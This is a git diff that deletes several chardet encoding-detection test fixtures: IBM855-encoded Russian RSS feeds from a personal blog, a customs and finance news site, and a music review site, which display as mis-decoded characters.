    · װ¨ ״בײדו·ום · כ¨װײ װ¨ ף ¢סום...¸ װ·ֶײ¬¦  ¢ײ׀םץ¨ װ¨ ף ¢ײ׀¨ום װ¨·ף׀¨·ׂײ½ ¢ײ׀¨ףװם, ֶ ֶײוײבײ½ חי¨ כסב ¢ײו װ דוײ½ֶ·½ ·ׂׂחװ·ו¨ו, ·¦ו· ״ײ י·ףװםׂ װײכסµ ו¨װ¨½ דֶײ׀םף · װ¨ דכף װײ ¢׀·ףֶײ,״ײװ·ׂ , וײ װ·¨¬ײ ו ֶײ¬ײ װ· כ ֶײׂ װ¨ו, ֶ ֶ קוײ¬ײ װ¨ ¢ס׀ײ · ¦ײ קוײ¬ײ, כד¨ ״ב·¦חׂ װײ · ·¦¨ ׀·ף·בײכ װײ ״בײדוײ כ ׂײף¬ µ.׃ײף¬ ¨׀ײכ¨ֶ  ¦ײ ד·µ ״ײב כײדםׂײ¨ ח¦ײ דכ¨ו ,ו¨ׂ ¢ײ׀¨¨ ׂײ·. -
    -
    -
    -false -
    -
    diff --git a/chardet/tests/IBM855/kapranoff.ru.xml b/chardet/tests/IBM855/kapranoff.ru.xml deleted file mode 100644 index 285cb4f..0000000 --- a/chardet/tests/IBM855/kapranoff.ru.xml +++ /dev/null @@ -1,161 +0,0 @@ - - - - - -Kappa's Lair v2.0 -http://kapranoff.ru/ - -en-us - -2003-12-18T17:40:29+03:00 - - - - - - - - - - - - - - - - - - - - - - - - - -״ח׀ׂ-״ח׀ׂ -http://kapranoff.ru/archives/003663.html - - -kappa -2003-12-18T17:40:29+03:00 - - -«ײ׀םֶ׀ײב -http://kapranoff.ru/archives/003662.html - - -kappa -2003-12-18T15:46:04+03:00 - - -<![CDATA[¡ כס ¬ײכײב·ו¨ — ¦װ¨כװ·ֶ·...]]> -http://kapranoff.ru/archives/003661.html -טװ·ֶ ׀םװס½, װ  ׂײ½ כף¬׀¦, ״בײ¦חֶו ֶײ׀׀¨ֶו·כװײ¬ײ וכײב¨דוכ . ַװ·¬  ₪¨׀ . ױ¨ ״ײי ׀¨¨ו¨. ַײץֶ· ׂסץֶײ½. ׳¦װ י¦ס דײ׀װ¨װײ½ ״ײבײ½, £ס׀ ¦¨װם ¦ײי¦׀·כ ·... - -kappa -2003-12-17T16:54:58+03:00 - - -׃חקװ¦ײ׀·װ  -http://kapranoff.ru/archives/003660.html -גחדדֶ·½ ד ½ו ײ ¬ח¢װסµ ¬ בׂײץֶ µ · ·¬ב¨ װ  װ·µ. ַ ½×. § כװײ µײו¨׀ װ ״·ד ום ײ װ„ׂ, ¦  כײו ף ¢סכ ׀ כד„. Lonesome... - -kappa -2003-12-17T13:49:03+03:00 - - -ֶ ׂ¢קֶ -http://kapranoff.ru/archives/003659.html -פ¦ב דו¨ כ ׂ ד µכײדו·ֶײׂ. א ׂײ¬ ¢ס ׂװײ¬ײ װ ״·ד ום ײ וײׂ, ¨ׂ ף װ·ׂ ׀ד כד קוח װ¨¦¨׀. ׃װ¨ ׀¨װם. ׳כ·װֶ  װ¨... - -kappa -2003-12-17T13:42:39+03:00 - - -ַ¨ׂ ¢סום? -http://kapranoff.ru/archives/003657.html -ה¢ב¨װ¦·׀, כ·¦·ׂײ, כ ץ ״ײֶײבװס½ ד חׂ  דײכד¨ׂ ײו ¢¨ף¦¨׀ם. ה·יח כײו, וב ח ¢¨ףחׂװס¨ ¦¨װם¬· כ ¢בװדֶײׂ ·װו¨בװ¨ו¨, ״בײµײיח ו¨דוס װ ... - -kappa -2003-12-13T12:15:13+03:00 - - -§¨װם ֶײװדו·וח₪·· -http://kapranoff.ru/archives/003656.html -¨׀ײכ¨¨ֶ, ֶײוײבס½ ד¦¨׀ ׀ ׂ¨װ ׂ¨׀ײׂ װײׂ, ד¨¬ײ¦װ ײוׂ¨ ¨ו דכײ„ ¦¨װםבײי¦¨װ·¨ :) טב , ו ֶ ״ײ׀ ¬ , ¦  כ¨¦ם? ײדכש  ¨½ כסµײ¦ כוײבײ¬ײ... - -kappa -2003-12-12T15:18:10+03:00 - - -׀סו¦ס¢ב -http://kapranoff.ru/archives/003655.html - - -kappa -2003-12-09T17:51:23+03:00 - - -ה ׂײ¨ ײװײ -http://kapranoff.ru/archives/003646.html - - -kappa -2003-12-07T23:09:31+03:00 - - -ה״ײבו-רֶד״ב¨דד דײײ¢ש ¨ו -http://kapranoff.ru/archives/003654.html - - -kappa -2003-12-06T18:19:27+03:00 - - -פ¨ׂ׀װ¨-3 -http://kapranoff.ru/archives/003653.html - §¨כײֶ  · ¦ ׀ ½-׀ ׂ . ­¨װ· ׀םװײ. פ¦¨דם כד„.... - -kappa -2003-12-05T13:34:08+03:00 - - -׃חףסֶ  ד װ ׂ· -http://kapranoff.ru/archives/003652.html - ַח״·׀ כײו. ײב ¦ײכ ׀ דו ב·ֶ . ה¨¢.... - -kappa -2003-12-04T19:56:54+03:00 - - -ױײכײדו¨װם -http://kapranoff.ru/archives/003651.html -¡ חד וס½ ג¨כֶ·װ דײ וײכ ב·ש· ף ֶ װ·כ ¨ו ף ״·דם װײכײ¬ײ  ׀ם¢ײׂ . ל דח¢¢ײוח ײװ·, ֶדו ו·, ¢ח¦חו כ ¥§¶. א ׂײי¨ו ¢סום דµײיח.... - -kappa -2003-12-04T18:58:46+03:00 - - -ה·װ·½ כײ׀, ·ד״ײ׀װ¨װװס½ ײ¨½ -http://kapranoff.ru/archives/003650.html -£­ ײ כדֶײׂ ב ףװײׂ. ײ½ׂ·ו¨, ¨דום , ״·ץח ״¨דװ·, ·µ ״ײ, ח ׂ¨װ ¨דום דכײ קדו¨ו·ֶ . ¸ ¨דום... - -kappa -2003-12-03T22:44:54+03:00 - - -כי·ֶ-כי·ֶ -http://kapranoff.ru/archives/003649.html -¡ , ׂ¨י¦ח ו¨ׂ, כ¨בװח׀ד ·ף £בװדֶ . ז ֶ·¨ ¦¨׀ .... - -kappa -2003-12-03T11:37:49+03:00 - - - - diff --git a/chardet/tests/IBM855/money.rin.ru.xml b/chardet/tests/IBM855/money.rin.ru.xml deleted file mode 100644 index 4c411de..0000000 --- a/chardet/tests/IBM855/money.rin.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - -רֶײװײׂ·ֶ  · ×·װ װדס -http://money.rin.ru -רֶײװײׂ·¨דֶ·¨ · ×·װ װדײכס¨ װײכײדו· -ru-ru -Copyright 2003, Greenline, Kazan, Russia -Wed, 04 Jan 2006 02:20:05 GMT -Wed, 04 Jan 2006 02:20:05 GMT -http://backend.userland.com/rss091 -money@rin.ru -webmaster@dionys.pp.ru - - -ה¸ז©ה װ¨ חוכ¨ב¦·׀  ֶכײוס װ  קֶד״ײבו ¨בװײ½ ·ֶבס · ײד¨ובײכסµ -http://money.rin.ru/content/news/?id=106325&from=rss -ה¨ֶב¨ו ב· ו ַײװכ¨װ₪·· ײ ׂ¨י¦חװ בײ¦װײ½ וײב¬ײכ׀¨ ¦·ֶ·ׂ· כ·¦ ׂ· × חװס · ×׀ײבס, װ µײ¦ש·ׂ·ד ״ײ¦ ח¬בײףײ½ ·ד¨ףװײכ¨װ· (ה¸ז©ה), ף כ·׀ כײ כוײבװ·ֶ, וײ װ¨ דׂײי¨ו חוכ¨ב¦·ום ֶכײוס װ  קֶד״ײבו ¨בװײ½ ·ֶבס · ײד¨ובײכסµ װ  2006 ¬ײ¦ ¦ײ ו¨µ ״ײב, ״ײֶ  דוב װס-״בײ·ףכײ¦·ו¨׀· װ¨ ״ב¨¦ײדו כו ״ײ׀װח ·װ×ײבׂ ₪· ײ דײדוײװ·· ״ײ״ח׀₪·· ײד¨ובײכסµ. - - - -לכ¨¦¨װ ׂ¨י¦חװ בײ¦װס½ ף ״ב¨ו װ  קֶד״ײבו ¨בװײ½ ·ֶבס -http://money.rin.ru/content/news/?id=106324&from=rss -לכ¨¦¨װ ׂ¨י¦חװ בײ¦װס½ ף ״ב¨ו װ  קֶד״ײבו ¨בװײ½ ·ֶבס. ַ ֶ ״¨ב¨¦ ¨ו "רµײ ׃ײדֶכס", קוײ ב¨ץ¨װ·¨ ״ב·װוײ כ ך¨װ¨כ¨ װ  ף ד¨¦ װ·· ׂ¨י¦חװ בײ¦װײ½ ײב¬ װ·ף ₪·· ״ײ וײב¬ײכ׀¨ ¬בײףש·ׂ· ·ד¨ףװײכ¨װ·¨ׂ כ·¦ ׂ· ×׀ײבס · × חװס (CITES). - - - -בײ¢׀¨ׂ  ״בײµײי¦¨װ· ¬ב װ·₪ס וחב·דו·¨דֶ·ׂ·  כוײ¢חד ׂ·, ד׀¨¦חש·ׂ· ·ף גײדד·· כ ©כבײ״ח, ב¨ץ¨װ  -http://money.rin.ru/content/news/?id=106323&from=rss -בײ¢׀¨ׂ  ״בײµײי¦¨װ· ¬ב װ·₪ס וחב·דו·¨דֶ·ׂ·  כוײ¢חד ׂ·, ד׀¨¦חש·ׂ· ·ף גײדד·· כ ©כבײ״ח, ב¨ץ¨װ . ַ ֶ דײײ¢ש·׀· כ גײדד·½דֶײׂ דײף¨ וחב·װ¦חדוב··, ד 1 װכ ב 2006¬. כ £¨׀ײבחדד·· ײוׂ¨װוד כד¨ ׂ¨דוװס¨ ד¢ײבס ״ב· ״¨ב¨ד¨¨װ·· ¬ב װ·₪ס. - - - -חו·װ ״ײ¦״·ד ׀ ף ֶײװ ײ כװ¨ד¨װ·· ·ףׂ¨װ¨װ·½ כ ז ׂײי¨װװס½ ֶײ¦¨ֶד ג« -http://money.rin.ru/content/news/?id=106322&from=rss -ב¨ף·¦¨װו גײדד·· ל׀ ¦·ׂ·ב חו·װ ״ײ¦״·ד ׀ ר¦¨ב ׀םװס½ ף ֶײװ "׳ כװ¨ד¨װ·· ·ףׂ¨װ¨װ·½ כ דו ום· 147 · 388 ז ׂײי¨װװײ¬ײ ֶײ¦¨ֶד  גײדד·½דֶײ½ «¨¦¨ב ₪··", ״ב·װוס½ ­ײד¦חׂײ½ 23 ¦¨ֶ ¢ב · ײ¦ײ¢ב¨װװס½ הײכ¨וײׂ «¨¦¨ב ₪·· 27 ¦¨ֶ ¢ב 2005 ¬ײ¦ . - - - -"­¡פג׳׃" ג©ַג¡ז¸ׁ ׳הז¡לַ¸ ­¡פ¡ ױ¡ טַג¡¸ױט -http://money.rin.ru/content/news/?id=106321&from=rss -ה¨¬ײ¦װ װ ·װ  ד 10.00 כ דכף· ד ײוֶ ףײׂ ױ¡ַ"ױ ×וײ¬ ף טֶב ·װס" ײו ״ײ¦״·ד װ· ֶײװוב ֶו  װ  ״ײדו כֶח ¬ ף  כ 2006 ¬ײ¦ח, ׳¡׳"­ ף״בײׂ" ״ב¨ֶב ו·׀ײ ״ײדו כֶח ¬ ף  ״ײוב¨¢·ו¨׀ׂ טֶב ·װס. הײײוכ¨ודוכחש¨¨ ״ב¨¦ח״ב¨י¦¨װ·¨ ¢ס׀ײ ײ×·₪· ׀םװײ װ ״ב כ׀¨װײ חֶב ·װדֶײ½ דוײבײװ¨ 31 ¦¨ֶ ¢ב 2005 ¬ײ¦ . - - - -לכײ¦וד װײכס¨ ״ב כ·׀  ״¨ב¨ד¨¨װ· ¬ב װ·₪ דײ דוב װ ׂ· £ ׀ו·· -http://money.rin.ru/content/news/?id=106320&from=rss -¸ףׂ¨װ¨װ· כ ״ײב¦ֶ¨ ״¨ב¨ד¨¨װ· ¬ב װ·₪ דײ דוב װ ׂ· £ ׀ו·· ככײ¦וד ד 1 װכ ב 2006 ¬ײ¦ . ַ ֶ דײײ¢ש·׀· ג¸¡ ױײכײדו· כ ׃¸§ גײדד··, ״ב· וב װף·ו¨ ¨ב¨ף ו¨בב·וײב· ׁ·וכס כ ַ ׀·װ·װ¬ב ¦דֶח ײ¢׀ דום · ·ף ײ¢׀ דו· ד 2006 ¬ײ¦  ״ב¨ֶב ש ¨וד ¦¨½דוכ·¨ ף ¬ב װ·װײ¬ײ ״ ד״ײבו  הההג. - - - -ה 1 װכ ב כדוח״ ¨ו כ ד·׀ח ף ֶײװ ײ¢ ײדײ¢סµ קֶײװײׂ·¨דֶ·µ ףײװ µ -http://money.rin.ru/content/news/?id=106319&from=rss -ה 1 װכ ב כדוח״ ¨ו כ ד·׀ח ף ֶײװ ײ¢ ײדײ¢סµ קֶײװײׂ·¨דֶ·µ ףײװ µ (׳רפ), ״ב¨¦חדׂ וב·כ ש·½ ו ׂײי¨װװס¨ · װ ׀ײ¬ײכס¨ ׀ם¬ײוס ¦׀ ב¨ף·¦¨װוײכ קו·µ ףײװ. הײ¬׀ דװײ ף ֶײװ , כ גײדד·· ¢ח¦חו דײף¦ װס ׳רפ ¦כחµ ו·״ײכ: ״בײׂסץ׀¨װװײ-״בײ·ףכײ¦דוכ¨װװס¨ · ו¨µװ·ֶײ-כװ¨¦ב¨װ¨דֶ·¨. - - - -«¨¦¨ב ׀םװ  ו ׂײי¨װװ  ד׀חי¢  כ 2005 ¬ײ¦ח -http://money.rin.ru/content/news/?id=106318&from=rss -ײ״ײ׀װ¨װ·¨ ¦ײµײ¦װײ½  דו· ר¦¨ב ׀םװײ¬ײ ¢¦י¨ו  ײדו כ ׀ײדם ײ¦װ·ׂ ·ף כ יװ¨½ץ·µ װ ״ב כ׀¨װ·½ ¦¨ו¨׀םװײדו· ו ׂײי¨װװײ½ ד׀חי¢ס גײדד··. ל 2005 ¬., ״ײ ״ב¨¦כ ב·ו¨׀םװסׂ ¦ װװסׂ, ו ׂײי¨װװסׂ· ײב¬ װ ׂ· ״¨ב¨·ד׀¨װײ כ ¦ײµײ¦ ר¦¨ב ׀םװײ¬ײ ¢¦י¨ו  2 וב·׀׀·ײװ  102,2 ׂ·׀׀· ב¦  בח¢׀¨½, וײ דײדו כ·׀ײ 103% ײו ֶײװובײ׀םװײ¬ײ ף ¦ װ·. - - - -ׁ¢ס¨ ״׀ װס ״ײ ״׀¨ח -http://money.rin.ru/content/news/?id=106317&from=rss -ה µײבײץ·ׂ װ דובײ¨װ·¨ׂ כדוב¨ ו ױײכס½ ¬ײ¦ ו ׂײי¨װװ·ֶ· § ׀םװ¨¬ײ לײדוײֶ . §׀ קוײ¬ײ ¨דום µײבײץ·½ ״ײכײ¦ - ¦¨ֶ ¢בםדֶ·½ ״׀ װ ״ײ ד¢ײבח ו ׂײי¨װװסµ ״׀ ו¨י¨½ כס״ײ׀װ¨װ ·ׂ· װ  115 %. ל ר¦¨ב ׀םװס½ ¢¦י¨ו ״¨ב¨·ד׀¨װײ 9 ׂ׀ב¦. - - - -ַײװדח׀םו ו·כװס½ דײכ¨ו ב¨ץ ¨ו · װ¨¢ײ׀םץ·¨ כײ״בײדס, · ֶײװ₪¨״וח ׀םװס¨ ״בײ¢׀¨ׂס -http://money.rin.ru/content/news/?id=106316&from=rss -ײ דײײ¢ש¨װ· ״ב¨דד-ד׀חי¢ס זט ג«, ײ¨ב¨¦װײ¨ ף ד¨¦ װ·¨ ַײװדח׀םו ו·כװײ¬ײ דײכ¨ו  ״ײ ב ¢ײו¨ ד ח דוװ·ֶ ׂ· לר§ ״ב· יװײׂ ו ׂײי¨װװײׂ ח״ב כ׀¨װ·· דײדוײ׀ײדם כ ¦¨ֶ ¢ב¨ װ  ¢ ף¨ ׳׳׳ "ז ¬ װבײ¬דֶ·½  כוײׂײ¢·׀םװס½ ף כײ¦". - - - -ַײ׀׀¨¬· «זה גײדד·· ב דדׂײוב¨׀  כײ״בײדס ״ײ¦¬ײוײכֶ· ׀ װ  ¦¨½דוכ·½ ״ײ ב¨ ׀·ף ₪·· ַײװ₪¨״₪·· ב ףכ·ו· ו ׂײי¨װװסµ ײב¬ װײכ גײדד·½דֶײ½ «¨¦¨ב ₪·· -http://money.rin.ru/content/news/?id=106315&from=rss -29 ¦¨ֶ ¢ב 2005 ¬ײ¦  דײדוײ׀ײדם ף ד¨¦ װ·¨ ֶײ׀׀¨¬·· «¨¦¨ב ׀םװײ½ ו ׂײי¨װװײ½ ד׀חי¢ס גײדד··, װ  ֶײוײבײׂ ¢ס׀· ב דדׂײוב¨װס כײ״בײדס כסב ¢ײוֶ· ״׀ װ  ׂ¨ב ״ײ ב¨ ׀·ף ₪·· ַײװ₪¨״₪·· ב ףכ·ו· ו ׂײי¨װװסµ ײב¬ װײכ גײדד·½דֶײ½ «¨¦¨ב ₪·· װ  2006-2010 ¬ײ¦ס, ײ¦ײ¢ב¨װװײ½ ב כ·ו¨׀םדוכײׂ גײדד·½דֶײ½ «¨¦¨ב ₪·· 8 ¦¨ֶ ¢ב ד.¬. - - - -׳ כדוח״׀¨װ·· כ ד·׀ח ״ײדו װײכ׀¨װ· ב כ·ו¨׀םדוכ  ג« "׳ ב¨¬ח׀·בײכ װ·· ·ׂ״ײבו  ¬ײכ¦·װס ׂײבײי¨װײ½ כ 2006 ¬ײ¦ח" -http://money.rin.ru/content/news/?id=106314&from=rss -ה 1 װכ ב 2006 ¬ײ¦  כדוח״ ¨ו כ ד·׀ח ״ײדו װײכ׀¨װ·¨ ב כ·ו¨׀םדוכ  ג« N 729 ײו 5.12.2005 ¬. "׳ ב¨¬ח׀·בײכ װ·· ·ׂ״ײבו  ¬ײכ¦·װס ׂײבײי¨װײ½ כ 2006 ¬ײ¦ח ". הײ¬׀ דװײ ״ײדו װײכ׀¨װ·, ׂ¨װוד װ ·ׂ¨װײכ װ· וב¨µ ״ײ¦דח¢״ײף·₪·½ זױ לר§ (0202 30 100 3, 0202 30 500 3 · 0202 30 900 3), כ ֶײוײבס¨ כֶ׀ ¨וד חד׀ײכ·¨ ×ב װֶײ-¬ב װ·₪ס דוב װס ככײף ,   ו ֶי¨ חדו װ כ׀·כ וד װײכס¨ דו כֶ· ככײףװסµ ״ײץ׀·װ דײ¬׀ דװײ ״ב·׀ײי¨װ·. - - - -ַכײוס װ  ·ׂ״ײבו ¢ח¦חו ·ד״ײ׀םףײכ װס ״ײ׀װײדום -http://money.rin.ru/content/news/?id=106313&from=rss -ה 1 װכ ב כדוח״ ¨ו כ ד·׀ח ״ײדו װײכ׀¨װ·¨ ב כ·ו¨׀םדוכ  ג« "׳ ¦ײ״ײ׀װ·ו¨׀םװסµ ׂ¨ב µ ״ײ ב¨¬ח׀·בײכ װ· ·ׂ״ײבו  ¬ײכ¦·װס, דכ·װ·װס · ׂד  ¦ײׂ ץװ¨½ ״ו·₪ס כ 2006 - 2009 ¬ײ¦ µ" (N 733 ײו 5.12.2005 ¬.), ״ב·ףכ װװײ¨ ײ¢¨ד״¨·ום ״ײ׀װײ¨ ·ד״ײ׀םףײכ װ·¨ ֶכײו װ  ·ׂ״ײבו ״¨ב¨·ד׀¨װװסµ כ·¦ײכ ״בײ¦חֶ₪··. - - - -הװ·י וד דו כֶ· ״ײץ׀·װס װ  דכ·װ·װח -http://money.rin.ru/content/news/?id=106312&from=rss -ה 1 װכ ב 2006 ¬ײ¦  כדוח״ ¨ו כ ד·׀ח ״ײדו װײכ׀¨װ·¨ ב כ·ו¨׀םדוכ  ג« "׳ ב¨¬ח׀·בײכ װ·· ·ׂ״ײבו  דכ·װ·װס כ 2006 ¬ײ¦ח" (N 730 ײו 05.12.2005 ¬.), חדו װ כ׀·כ ש¨¨ דחׂׂ בװס½ ײ¢¨ׂ ככײף  כ גײדד· דכ·װ·װס כ ב ףׂ¨ב¨ 476,1 וסד. - - - -ה״ײב·ום ¬ב ׂײוװײ · ״ײ ¦¨׀ח -http://money.rin.ru/content/news/?id=106311&from=rss -ה 1 װכ ב 2006 ¬ײ¦  כדוח״·ו כ ד·׀ח ״ב·ֶ ף «¨¦¨ב ׀םװײ½ ו ׂײי¨װװײ½ ד׀חי¢ס "׳¢ ײד״ ב·כ װ·· ו ׂײי¨װװסׂ· ײב¬ װ ׂ· כדוח״·כץ·µ כ ף ֶײװװח ד·׀ח דח¦¨¢װסµ  ֶוײכ  ב¢·וב יװסµ דח¦ײכ כ ״ײב¦ֶ¨ װ ¦ףײב " (N 1080 ײו 17 װײ¢ב 2005 ¬ײ¦ ). - - - - diff --git a/chardet/tests/IBM855/music.peeps.ru.xml b/chardet/tests/IBM855/music.peeps.ru.xml deleted file mode 100644 index 11b1e39..0000000 --- a/chardet/tests/IBM855/music.peeps.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - ׃חףסֶ  װ  PeePs.ru: ב¨₪¨װף·· - ©י¨¦װ¨כװײ¨ ׂחףסֶ ׀םװײ¨ ·ף¦ װ·¨ - http://music.peeps.ru - - - ׃חףסֶ  װ  PeePs.ru - http://www.peeps.ru/banners/our/zn.gif - http://music.peeps.ru - 88 - 31 - - - - "SMASH!" - Freeway - http://music.peeps.ru/news/s/2003/03/19/1432.html - « ֶו, וײ ¢סכץ·¨ «ױ¨״ײד¨¦ס»,   װסװ¨ «Smash!» ככ ׀·׀·דם כ ֶײו¨׀ ץײח-¢·ףװ¨ד  ¢׀ ¬ײ¦ ב ״ײ¢¨¦¨ כ ״ב¨דו·יװײׂ ׂחףסֶ ׀םװײׂ ֶײװֶחבד¨, װ· ֶײ·ׂ ײ¢ב ףײׂ װ¨ ״ײףכײ׀¨ו דו כ·ום ·µ כ ײ¦·װ חבײכ¨װם ד «§בח¬·ׂ· ״ב כ·׀ ׂ·», «ַײבװׂ·» ·׀· «« ¢ב·ֶײ½». לײ-״¨בכסµ, «Smash!» ״ײו װ   װ¬׀·½דֶײׂ, כײ-כוײבסµ, ״ײו ״בײדוײ ף¦ײבײכײ! - - - - £׳ׁמצ¡א הז¸גַ¡ 3 Artist : V / A - http://music.peeps.ru/news/s/2003/03/19/1431.html - לד¨ׂ ו¨׀¨ףב·ו¨׀ׂ,   ו ֶי¨ ו¨׀¨ףב·ו¨׀םװ·₪ ׂ! £׀ ¬ײ¦ ב דכײ¨ׂח ד¢ײבװ·ֶח · ״בײ¬ב ׂׂ¨ «£ײ׀םץ  דו·בֶ » ¡.׃ ׀ µײכ ¦ ב·ו כ¨ד¨װװ¨¨ װ דובײ¨װ·¨! ױ  ׂ דדײכח «הו·בֶח» ״ב·¬׀ ץ¨װס ¦ײׂײµײף½ֶ· ¡׀דח ד ״¨דװ¨½ «ל¨ב », הכ¨ו  ד µ·וײׂ «לד¨-ו ֶ· ׂײיװײ», ׃ ץ  ג ד״חו·װ  ד «החׂ דץ¨¦ץ·ׂ ¦ײי¦¨ׂ», ז װ £ח׀ װײכ  ד וב¨ֶײׂ - - - - "BENEFIT" - http://music.peeps.ru/news/s/2003/03/19/1430.html - ה׀ײכײ benefit ד  װ¬׀·½דֶײ¬ײ ײףװ  ¨ו «״ײ׀םף », «כס¬ײ¦ ». טי װ¨ ףװ , װ  דֶײ׀םֶײ כס¬ײ¦װײ ¢ס׀ײ ״בײ¦ד¨ב ׂ ¦חקו  ײדו כ׀ום ״׀ דו·װֶח ¢¨ף װ ףכ װ·, װײ וײ, וײ ד·װ¬׀ «Sex Sells» ¦ײ׀¬ײ װ¨ ד״ײ׀ף ׀ ד וײ״-״ײף·₪·½, כװײ װ¨ ײדו כ·׀ײ «Benefit» כ ״בײ·¬בסץ¨. - - - - "׳ַ©¡ױ ©ׁמפ¸" - הח״¨בד·ׂ¨ובi - http://music.peeps.ru/news/s/2003/03/19/1429.html - ¨בכײ¨, וײ ¢בײד ¨וד כ ¬׀ ף  - ײ¢׀ײיֶ  ¦·דֶ : ֶ׀ כ·ץ· ×ײבו¨״· װײ װ  ¨בװײׂ ×ײװ¨ - כ·¦·ׂײ, קוײ כסב י¨װ·¨ וײ½ ד ׂײ½ «ד·ׂׂ¨וב··» ד ״ב·דו כֶײ½ «דח״¨ב», ײ¢ב ףײכ װװײ½ כ װ ףכ װ··  ׀ם¢ײׂ . ױײ, וײ ו ֶײ¨ דח״¨בד·ׂׂ¨וב·? - - - - TLC 3D - http://music.peeps.ru/news/s/2003/03/19/1425.html - ױײכס½  ׀ם¢ײׂ  ׂ¨ב·ֶ װײֶ TLC 3D - ¨וכ¨בוס½ ״ײ ד¨וח כ ¦·דֶײ¬ב ×·· וב·ײ. ל ב¨ףח׀םו ו¨ וב ¬·¨דֶײ½ ¬·¢¨׀· כ  כוײֶ ו דובײר ײ¦װײ½ ·ף ח דוװ·₪ ¬בח״״ס ׁ·ףס Left Eye ׁײ״¨ד וב·ײ ״ב¨כב ו·׀ײדם כ ¦חקו. Chilli · T-Boz ב¨ץ·׀· ״בײ¦ײ׀י ום דײכׂ¨דוװח ב ¢ײוח ¢¨ף וב¨ום¨½ ח דוװ·₪ס, װײ, ¨דו¨דוכ¨װװײ, וײ 3D ״ײדכש¨װ ¨¨ ״ ׂו·. - - - - DJ Tomekk - Beat Of Life, vol.1 - http://music.peeps.ru/news/s/2003/03/19/1424.html - §·¦י¨½ זײׂ¨ֶֶ - ׂ דו¨ב ¨כבײ״¨½דֶײ¬ײ חבײכװ, כסדוח״ כץ·½ כׂ¨דו¨ ד ו ֶ·ׂ· ו·ו װ ׂ· בק״ , ֶ ֶ RunDMC, Wu-tang Clan, LL Cool J · KRS-One, ד¦¨׀ כץ·½ ב¨ׂ·ֶדס װ  ״¨דװ· Brandy, Fugees · ¦ י¨ Jay-Z. לײו · װײכס½ ¨¬ײ  ׀ם¢ײׂ - Beat Of Life vol.1 - - - - Dieter Bohlen - Greatest Hits - http://music.peeps.ru/news/s/2003/03/19/1423.html - לס״חש¨װװס½ ֶײׂ״ װ·¨½ BMG ד¢ײבװ·ֶ ׀חץ·µ ״¨ד¨װ ״¨כ₪ , ֶײׂ״ײף·וײב  · ״בײ¦ד¨ב  §·ו¨ב  £ײ׀¨װ  - ב ¦ײדום ¦׀ בײׂ װו·װסµ ״ײֶ׀ײװװ·₪ ד׀ ¦ֶײ¬ײ׀ײדײ¬ײ װ¨ׂ₪ . §  · װ¨ וײ׀םֶײ ¦׀ װ·µ: ד¢ײבװ·ֶ װ¨״ב·וף ו¨׀םװײ½ ׂ¨׀ײ¦·װײ½ ״ײ״-ׂחףסֶ· ײו׀·װײ ״ײ¦ײ½¦¨ו ¦׀ כ¨¨ב·װײֶ ד ו װ₪ ׂ·. - - - - ַבחוײ וס ״ײ״ ׀. «¡£ג¸ַ¡ פל©פ§ - http://music.peeps.ru/news/s/2003/03/12/1366.html - « ¢ב·װײ¨ ״בײ·ףכײ¦דוכײ װ¨ דוײ·ו װ  ׂ¨דו¨,   כסµײ¦·ו װ  װײכס¨ ב¨׀םדס - «ףכ¨ף¦ װחוס¨» «ֶבחוײ ״ײ״ ׀·» ו¨״¨בם װ¨ וײ׀םֶײ װ  וכ-קֶב װ, װײ · װ  ֶײׂ״ ֶו-¦·דֶ. ג¨ףח׀םו ו, ¬ײכײבש·½ ד ׂ ף  ד¨¢ - «× ¢ב·ֶ » ·ׂ. ׃ וכ·¨װֶײ ב ¢ײו ¨ו דו ¢·׀םװײ · ״בײ¦חֶו·כװײ. - - - - "פכ¨ב·" - "¬ײ׀ײ¦" - http://music.peeps.ru/news/s/2003/02/26/1293.html - 13 וב¨ֶײכ ¦¨¢וװײ¬ײ  ׀ם¢ײׂ  ¬בח״״ס «פכ¨ב·» כ ₪¨׀ײׂ ײדו כ׀ו ״ב·וװײ¨ כ״¨ ו׀¨װ·¨, װײ י¨ כב¨ׂ װ¨ ״ײֶ·¦ ¨ו ײשחש¨װ·¨ װ¨ֶײוײבײ¬ײ ײ¦װײײ¢ב ף·. ­¦¨-וײ װ  ד¨ב¨¦·װ¨ ״בײד׀חץ·כ װ· ¦·דֶ  ״ײכ׀¨וד ײשחש¨װ·¨, וײ ·¬ב ¨ו ײ¦װ  · ו  י¨ ״¨דװ - - - - Moral Codex - The best - http://music.peeps.ru/news/s/2003/02/26/1292.html - ה¢ײבװ·ֶ The Best, כס״חש¨װװס½ ×·בׂײ½ CD Land כ 2002 ¬ײ¦ח, ״ב¨¦דו כ׀¨ו דײ¢ײ½ ״ײ¦¢ײבֶח ׀חץ·µ µ·וײכ ¬בח״״ס «׃ײב ׀םװס½ ַײ¦¨ֶד». §חׂ ¨וד, ׂקובס «׃ײב ׀םװס½ ַײ¦¨ֶד» כ ײדײ¢ײׂ ״ב¨¦דו כ׀¨װ·· װ¨ װחי¦ וד. - - - - 'ז¨װם - 64' - '׳¢בסכֶ· ×ב ף' - http://music.peeps.ru/news/s/2003/02/26/1291.html - §¨¢וװס½  ׀ם¢ײׂ ¬בח״״ס ·ף ױײכײ¬ײ ׳דֶײ׀  «ז¨װם - 64» ״ײ¦ װ ףכ װ·¨ׂ «׳¢בסכֶ· ×ב ף» ײוׂ¨¨װ כד¨ײ¢ש¨½ ¢ײ׀¨ףװם ׂײ׀ײ¦סµ בײדד·½דֶ·µ ֶײׂ װ¦: כבײ¦¨ ¢ס · ¬·ו בװס¨ דײ׀ײ ״ב·דחודוכחו, · כײֶ ׀ µײבײץ, · ·¬ב ו װ¨״׀ײµײ, · ״¨דװ· דײ·װו ֶב ד·כס¨. - - - - Angelight - §¨ו· ׳ֶ¨ װ  - http://music.peeps.ru/news/s/2003/02/23/1257.html - §ײׂײבײש„װװס¨ װ¨¦ײ¢בײי¨׀ ו¨׀· ׂחףסֶ· װם-ק½¦י ¦ כװײ חי¨ ײֶב¨דו·׀· ¨„ װח¦װײ½, ײ¦װײײ¢ב ףװײ½ · ¢¨דדׂסד׀¨װװײ½. ¸ קוײ װ¨כף·ב  װ  וײ, וײ ד ׂס½ ״ײד׀¨¦ײכ ו¨׀םװס½ ¨„ בײדד·½דֶ·½  ¦¨״ו Angelight ״ב¨ד׀¨¦ח¨ו ֶ י¦סׂ דכײ·ׂ  ׀ם¢ײׂײׂ כ״ײ׀װ¨ ֶײװֶב¨וװס¨ ₪¨׀·. - - - - NOFX "Pump Up The Valuum" - http://music.peeps.ru/news/s/2003/02/11/1199.html - ײµײי¨, ¦ײ¢·כץ·דם 